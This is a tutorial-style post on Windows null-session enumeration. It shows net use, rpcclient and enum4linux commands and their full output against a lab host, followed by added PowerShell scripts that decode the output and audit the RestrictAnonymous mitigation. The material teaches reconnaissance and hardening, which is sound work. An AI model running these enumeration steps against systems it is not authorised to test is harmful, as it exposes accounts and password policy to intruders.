Null Sessions are a ‘feature’ of Windows that lets an anonymous user connect to the IPC$ share and enumerate certain information. We can connect to it under Windows using the commands:

net use \\IP_ADDRESS\ipc$ "" /user:"" 
net use

or from Linux with:

rpcclient -U "" IP_ADDRESS

Once connected and at the “rpcclient $>” prompt, we can issue a ‘?’ to look at the supported commands. The most interesting are ‘enumdomusers’, ‘netshareenum’, ‘netshareenumall’ and ‘querydominfo’. Here’s the output against a sample lab machine:

rpcclient $> enumdomusers
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[npn] rid:[0x3f0]
user:[Guest] rid:[0x1f5]

rpcclient $> querydominfo
cli_pipe_validate_current_pdu: RPC fault code DCERPC_FAULT_OP_RNG_ERROR received from host 192.168.1.20!
Domain:		WINSRV
Server:		
Comment:	
Total Users:	13
Total Groups:	1
Total Aliases:	0
Sequence No:	899
Force Logoff:	-1
Domain Server State:	0x1
Server Role:	ROLE_DOMAIN_PDC
Unknown 3:	0x1
rpcclient $> 


We can also use nmblookup -A IP_ADDRESS to gather further information on the host:

root@pwn:~/pen/tools/windows/enum# nmblookup -A 192.168.1.20
Looking up status of 192.168.1.20
Unable to create directory /var/run/samba for file unexpected.tdb. Error was No such file or directory
	WINSRV          <00> -         B <ACTIVE> 
	MYDOMAIN        <00> - <GROUP> B <ACTIVE> 
	MYDOMAIN        <1c> - <GROUP> B <ACTIVE> 
	WINSRV          <20> -         B <ACTIVE> 
	MYDOMAIN        <1b> -         B <ACTIVE> 

	MAC Address = 00-50-56-A0-DE-34

Lastly, we can use the excellent tool ‘enum4linux’ to enumerate just about every possible detail available, including the use of RID cycling:

./enum4linux.pl 192.168.1.20
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 10 15:40:26 2013

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 192.168.1.20
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ====================================================== 
|    Enumerating MYDOMAIN/Domain on 192.168.1.20      |
 ====================================================== 
[+] Got domain/MYDOMAIN name: MYDOMAIN

 ============================================== 
|    Nbtstat Information for 192.168.1.20      |
 ============================================== 
Looking up status of 192.168.1.20
	WINSRV            <00> -         M <ACTIVE>  Workstation Service
	WINSRV            <03> -         M <ACTIVE>  Messenger Service
	ADMINISTRATOR     <03> -         M <ACTIVE>  Messenger Service
	MYDOMAIN          <00> - <GROUP> M <ACTIVE>  Domain/MYDOMAIN Name
	MYDOMAIN          <1e> - <GROUP> M <ACTIVE>  Browser Service Elections
	WINSRV            <20> -         M <ACTIVE>  File Server Service

	MAC Address = 00-50-56-AF-10-60

 ======================================= 
|    Session Check on 192.168.1.20      |
 ======================================= 
[+] Server 192.168.1.20 allows sessions using username '', password ''

 ============================================= 
|    Getting domain SID for 192.168.1.20      |
 ============================================= 
Domain Name: MYDOMAIN
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ======================================== 
|    OS information on 192.168.1.20      |
 ======================================== 
[+] Got OS info for 192.168.1.20 from smbclient: Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
[+] Got OS info for 192.168.1.20 from srvinfo:
	192.168.1.20 Wk Sv Sql NT SNT BMB 
	platform_id     :	500
	os version      :	5.0
	server type     :	0x29007

 =============================== 
|    Users on 192.168.1.20      |
 =============================== 
index: 0x1 RID: 0x3ef acb: 0x00000010 Account: admin	Name: (null)	Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0x6 RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain

user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]

 =========================================== 
|    Share Enumeration on 192.168.1.20      |
 =========================================== 
Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Domain=[MYDOMAIN] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]

	Sharename       Type      Comment
	---------       ----      -------
	IPC$            IPC       Remote IPC
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
session request to 192.168.1.20 failed (Called name not present)
session request to 192 failed (Called name not present)

	Server               Comment
	---------            -------
	WINSRV                 
	WIN-AHC4FHAF35FD     

	MYDOMAIN            Master
	---------            -------

[+] Attempting to map shares on 192.168.1.20
//192.168.1.20/IPC$	Mapping: OK	Listing: DENIED
//192.168.1.20/ADMIN$	Mapping: DENIED, Listing: N/A
//192.168.1.20/C$	Mapping: DENIED, Listing: N/A

 ====================================================== 
|    Password Policy Information for 192.168.1.20      |
 ====================================================== 

[+] Attaching to 192.168.1.20 using a NULL share

	[+] Trying protocol 445/SMB...

[+] Found domain(s):

	[+] WINSRV
	[+] Builtin

[+] Password Info for Domain: WINSRV

	[+] Minimum password length: None
	[+] Password history length: None
	[+] Maximum password age: 42 days 22 hours 47 minutes
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes
	[+] Locked Account Duration: 30 minutes
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: Not Set

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 0


 ================================ 
|    Groups on 192.168.1.20      |
 ================================ 

[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Guests] rid:[0x222]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has member: WINSRV\Guest
Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group 'Users' (RID: 545) has member: WINSRV\admin
Group 'Administrators' (RID: 544) has member: WINSRV\Administrator

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has member: WINSRV\Administrator
Group 'None' (RID: 513) has member: WINSRV\Guest
Group 'None' (RID: 513) has member: WINSRV\admin


 ========================================================================= 
|    Users on 192.168.1.20 via RID cycling (RIDS: 500-550,1000-1050)    |
 ========================================================================= 
[I] Found new SID: S-1-5-21-1606980848-73586283-839522115
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1606980848-73586283-839522115 and logon username '', password ''
S-1-5-21-1606980848-73586283-839522115-500 WINSRV\Administrator (Local User)
S-1-5-21-1606980848-73586283-839522115-501 WINSRV\Guest (Local User)
S-1-5-21-1606980848-73586283-839522115-502 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-503 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-504 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-505 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-506 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-507 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-508 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-509 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-510 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-511 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-512 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-513 WINSRV\None (Domain Group)
...
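Everything above is what the host hands to anyone who asks with an empty username and password. To make that exposure readable at a glance, here is an added PowerShell example (my own, not part of the original post and not code from rpcclient or enum4linux) that parses the user, NetBIOS name-table and RID-cycling lines shown above and decodes the acb flags, the well-known RIDs and the NetBIOS suffixes. The sample text is constructed from the lines in the output above; the flag names follow Samba's ACB_* bits (the MS-SAMR USER_* flags), and the RID and suffix tables are the standard well-known values.

```powershell
# Added example (not from the original post, rpcclient or enum4linux): decode what an
# anonymous session returned so a defender can read what the host leaks.
# Sample lines are constructed from the output shown earlier in the post.
$sample = @'
user:[admin] rid:[0x3ef]
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
index: 0x1 RID: 0x3ef acb: 0x00000010 Account: admin    Name: (null)    Desc: (null)
index: 0x2 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account
index: 0x6 RID: 0x1f5 acb: 0x00000215 Account: Guest    Name: (null)    Desc: Built-in guest account
    WINSRV          <00> -         B <ACTIVE>
    MYDOMAIN        <1c> - <GROUP> B <ACTIVE>
    WINSRV          <20> -         B <ACTIVE>
    MYDOMAIN        <1b> -         B <ACTIVE>
S-1-5-21-1606980848-73586283-839522115-500 WINSRV\Administrator (Local User)
S-1-5-21-1606980848-73586283-839522115-502 *unknown*\*unknown* (8)
S-1-5-21-1606980848-73586283-839522115-513 WINSRV\None (Domain Group)
'@

# Account-control bits as printed in the "acb:" column (Samba ACB_* names, MS-SAMR USER_* flags).
$AcbFlags = [ordered]@{
    ACB_DISABLED = 0x0001;  ACB_HOMDIRREQ = 0x0002;  ACB_PWNOTREQ = 0x0004
    ACB_TEMPDUP  = 0x0008;  ACB_NORMAL    = 0x0010;  ACB_MNS      = 0x0020
    ACB_DOMTRUST = 0x0040;  ACB_WSTRUST   = 0x0080;  ACB_SVRTRUST = 0x0100
    ACB_PWNOEXP  = 0x0200;  ACB_AUTOLOCK  = 0x0400
}

# Well-known RIDs; everything from 1000 upwards is a locally created account or group.
$WellKnownRids = @{
    500 = 'Administrator (built-in)'; 501 = 'Guest (built-in)'; 502 = 'krbtgt'
    512 = 'Domain Admins'; 513 = 'Domain Users ("None" on a standalone host)'
    514 = 'Domain Guests'; 515 = 'Domain Computers'; 516 = 'Domain Controllers'
    544 = 'Administrators (alias)'; 545 = 'Users (alias)'; 546 = 'Guests (alias)'
}

# NetBIOS name-table suffixes, keyed by suffix and unique (u) / group (g) registration.
$NetBiosSuffixes = @{
    '00/u' = 'Workstation Service (host name)'; '00/g' = 'Domain or workgroup name'
    '03/u' = 'Messenger Service (host or logged-on user)'; '1b/u' = 'Domain Master Browser'
    '1c/g' = 'Domain Controllers'; '1d/u' = 'Master Browser'
    '1e/g' = 'Browser Service Elections'; '20/u' = 'File Server Service'
}

function ConvertTo-AcbFlagNames([int]$Acb) {
    $names = @(foreach ($k in $AcbFlags.Keys) { if ($Acb -band $AcbFlags[$k]) { $k } })
    if ($names.Count -eq 0) { return 'none' }
    return ($names -join ',')
}

function Get-RidMeaning([int]$Rid) {
    if ($WellKnownRids.ContainsKey($Rid)) { return $WellKnownRids[$Rid] }
    if ($Rid -ge 1000) { return 'locally created account or group' }
    return 'reserved or unused well-known RID'
}

function ConvertFrom-NullSessionOutput([string]$Text) {
    $out = New-Object System.Collections.Generic.List[object]
    foreach ($line in ($Text -split "`r?`n")) {
        if ($line -match '^user:\[(?<name>[^\]]+)\]\s+rid:\[(?<rid>0x[0-9a-fA-F]+)\]') {
            $rid = [Convert]::ToInt32($Matches.rid, 16)
            $out.Add([pscustomobject]@{ Kind = 'User'; Name = $Matches.name; Id = $rid; Meaning = (Get-RidMeaning $rid) })
        }
        elseif ($line -match '^index:.*?RID:\s*(?<rid>0x[0-9a-fA-F]+)\s+acb:\s*(?<acb>0x[0-9a-fA-F]+)\s+Account:\s*(?<name>\S+)') {
            $acb = [Convert]::ToInt32($Matches.acb, 16)
            $out.Add([pscustomobject]@{ Kind = 'AccountFlags'; Name = $Matches.name; Id = $Matches.acb; Meaning = (ConvertTo-AcbFlagNames $acb) })
        }
        elseif ($line -match '^\s*(?<name>\S+)\s+<(?<sfx>[0-9a-fA-F]{2})>\s+-\s*(?<grp><GROUP>)?\s*[BPMH]?\s*<ACTIVE>') {
            $key = '{0}/{1}' -f $Matches.sfx.ToLower(), $(if ($Matches['grp']) { 'g' } else { 'u' })
            $meaning = if ($NetBiosSuffixes.ContainsKey($key)) { $NetBiosSuffixes[$key] } else { 'unrecognised suffix' }
            $out.Add([pscustomobject]@{ Kind = 'NetBIOS'; Name = $Matches.name; Id = "<$($Matches.sfx)>"; Meaning = $meaning })
        }
        # RID-cycling lines; the "*unknown*" placeholders are skipped because the account must not start with '*'.
        elseif ($line -match '^S-1-5-21(?:-\d+){3}-(?<rid>\d+)\s+(?<acct>[^*\s]\S*)\s+\((?<type>[^)]+)\)') {
            $rid = [int]$Matches.rid
            $out.Add([pscustomobject]@{ Kind = "RidCycle/$($Matches.type)"; Name = $Matches.acct; Id = $rid; Meaning = (Get-RidMeaning $rid) })
        }
    }
    return $out
}

ConvertFrom-NullSessionOutput $sample | Format-Table Kind, Name, Id, Meaning -AutoSize
```

Run against the sample, the table shows Guest's acb 0x215 decoding to ACB_DISABLED,ACB_PWNOTREQ,ACB_NORMAL,ACB_PWNOEXP (disabled, no password required, password never expires), Administrator's 0x210 to ACB_NORMAL,ACB_PWNOEXP, RID 513 as the local "None" group that stands in for Domain Users, and the <1c> group entry as the Domain Controllers registration. Paste the full enum4linux output into $sample to review a host of your own the same way.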

This vulnerability can be mitigated by setting the DWORD value ‘RestrictAnonymous’ to 1 in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA.
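As an added example (my own, not part of the original post), the following PowerShell script audits the RestrictAnonymous value named above and, with its own assumed -Apply switch, sets it to 1; the file name Check-RestrictAnonymous.ps1 is an assumption, and the two extra LSA values it reads (RestrictAnonymousSAM, EveryoneIncludesAnonymous) are related settings on XP/2003 and later that the post does not cover, listed for the audit only.

```powershell
# Added example (not from the original post): audit, and optionally apply, the RestrictAnonymous
# setting described above. Run in an elevated PowerShell on the Windows host being hardened.
# Save as Check-RestrictAnonymous.ps1 (file name assumed); -Apply is this script's own switch.
param([switch]$Apply)

$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-LsaDword([string]$Name) {
    # Reported as 0 when the value is absent from the registry.
    $item = Get-ItemProperty -Path $LsaKey -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.$Name
}

$current = Get-LsaDword 'RestrictAnonymous'
if ($current -ge 1) {
    Write-Output "RestrictAnonymous = $current : anonymous enumeration of accounts and shares is restricted"
} else {
    Write-Output "RestrictAnonymous = $current : null sessions can enumerate this host (weak setting)"
}

# Related LSA values on XP/2003 and later (not covered by the post; read-only here):
# RestrictAnonymousSAM=1 blocks anonymous SAM enumeration, EveryoneIncludesAnonymous=0
# keeps anonymous logons out of the Everyone group.
foreach ($name in 'RestrictAnonymousSAM', 'EveryoneIncludesAnonymous') {
    Write-Output ('{0} = {1}' -f $name, (Get-LsaDword $name))
}

if ($Apply -and $current -lt 1) {
    Set-ItemProperty -Path $LsaKey -Name RestrictAnonymous -Value 1 -Type DWord
    Write-Output 'RestrictAnonymous set to 1; restart the host, then re-run the rpcclient / enum4linux checks above to confirm the null session no longer enumerates users.'
}
```

Running the script without -Apply is safe for an audit; with -Apply it only writes the value when it is currently below 1, so re-running it is idempotent.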